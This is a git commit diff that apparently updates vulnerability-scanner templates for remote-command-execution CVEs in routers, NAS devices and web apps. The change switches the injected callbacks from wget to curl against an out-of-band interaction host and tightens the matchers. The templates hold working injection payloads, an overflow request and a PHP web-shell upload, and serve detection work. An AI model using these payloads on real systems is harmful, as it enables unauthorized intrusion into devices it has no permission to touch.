Merge pull request #6982 from projectdiscovery/additional-oast-matcher
Additional oast matcherpatch-1
commit
d0681f741b
|
@ -17,25 +17,34 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2018,dasan,gpon,rce,oast,kev
|
tags: cve,cve2018,dasan,gpon,rce,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /GponForm/diag_Form?images/ HTTP/1.1
|
POST /GponForm/diag_Form?images/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0
|
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /GponForm/diag_Form?images/ HTTP/1.1
|
POST /GponForm/diag_Form?images/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0
|
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/12
|
# Enhanced by mp on 2022/05/12
|
||||||
|
|
|
@ -13,6 +13,9 @@ info:
|
||||||
cve-id: CVE-2018-10818
|
cve-id: CVE-2018-10818
|
||||||
tags: cve,cve2018,lg-nas,rce,oast,injection
|
tags: cve,cve2018,lg-nas,rce,oast,injection
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -20,24 +23,26 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
&uid=10; wget http://{{interactsh-url}}
|
&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /en/php/usb_sync.php HTTP/1.1
|
POST /en/php/usb_sync.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: interactsh_request
|
||||||
- 200
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/26
|
# Enhanced by mp on 2022/04/26
|
||||||
|
|
|
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
|
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +34,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -41,6 +44,11 @@ requests:
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
|
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,17 +26,23 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
|
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
|
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
@ -17,20 +17,30 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2020,terramaster,rce,oast,mirai,unauth
|
tags: cve,cve2020,terramaster,rce,oast,mirai,unauth
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-434
|
cwe-id: CWE-434
|
||||||
tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
|
tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -34,7 +37,7 @@ requests:
|
||||||
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
||||||
Content-Type: image/gif
|
Content-Type: image/gif
|
||||||
|
|
||||||
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
|
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'");
|
||||||
|
|
||||||
-----------------------------31046105003900160576454225745--
|
-----------------------------31046105003900160576454225745--
|
||||||
|
|
||||||
|
@ -42,10 +45,16 @@ requests:
|
||||||
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
|
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
@ -25,10 +25,25 @@ requests:
|
||||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "null"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
# Enhanced by md on 2023/02/01
|
# Enhanced by md on 2023/02/01
|
||||||
|
|
|
@ -20,6 +20,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
|
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -28,7 +31,7 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /auth HTTP/1.1
|
POST /auth HTTP/1.1
|
||||||
|
@ -36,16 +39,18 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/29
|
# Enhanced by mp on 2022/04/29
|
||||||
|
|
|
@ -16,10 +16,13 @@ info:
|
||||||
cwe-id: CWE-787
|
cwe-id: CWE-787
|
||||||
tags: cve,cve2021,overflow,rce,sonicwall,kev
|
tags: cve,cve2021,overflow,rce,sonicwall,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
|
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
attack: clusterbomb
|
attack: clusterbomb
|
||||||
|
@ -30,10 +33,16 @@ requests:
|
||||||
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
||||||
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/29
|
# Enhanced by mp on 2022/04/29
|
||||||
|
|
|
@ -15,6 +15,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2021,lantronix,rce,oast,cisco
|
tags: cve,cve2021,lantronix,rce,oast,cisco
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,7 +26,7 @@ requests:
|
||||||
Authorization: Basic dXNlcjp1c2Vy
|
Authorization: Basic dXNlcjp1c2Vy
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
|
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST / HTTP/1.1
|
POST / HTTP/1.1
|
||||||
|
@ -31,12 +34,19 @@ requests:
|
||||||
Authorization: Basic YWRtaW46UEFTUw==
|
Authorization: Basic YWRtaW46UEFTUw==
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
|
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/05
|
# Enhanced by mp on 2022/05/05
|
||||||
|
|
|
@ -17,6 +17,9 @@ info:
|
||||||
cwe-id: CWE-434
|
cwe-id: CWE-434
|
||||||
tags: viaware,cve,cve2021,kramer,edb,rce
|
tags: viaware,cve,cve2021,kramer,edb,rce
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -27,13 +30,19 @@ requests:
|
||||||
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
|
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1
|
GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/18
|
# Enhanced by mp on 2022/05/18
|
||||||
|
|
|
@ -17,6 +17,9 @@ info:
|
||||||
cwe-id: CWE-94
|
cwe-id: CWE-94
|
||||||
tags: cve,cve2021,tplink,rce,router
|
tags: cve,cve2021,tplink,rce,router
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +33,7 @@ requests:
|
||||||
dataBlockSize=64
|
dataBlockSize=64
|
||||||
timeout=1
|
timeout=1
|
||||||
numberOfRepetitions=4
|
numberOfRepetitions=4
|
||||||
host=$(echo 127.0.0.1; wget http://{{interactsh-url}})
|
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
|
||||||
X_TP_ConnName=ewan_ipoe_d
|
X_TP_ConnName=ewan_ipoe_d
|
||||||
diagnosticsState=Requested
|
diagnosticsState=Requested
|
||||||
|
|
||||||
|
@ -43,10 +46,16 @@ requests:
|
||||||
|
|
||||||
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
|
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/27
|
# Enhanced by mp on 2022/02/27
|
||||||
|
|
Loading…
Reference in New Issue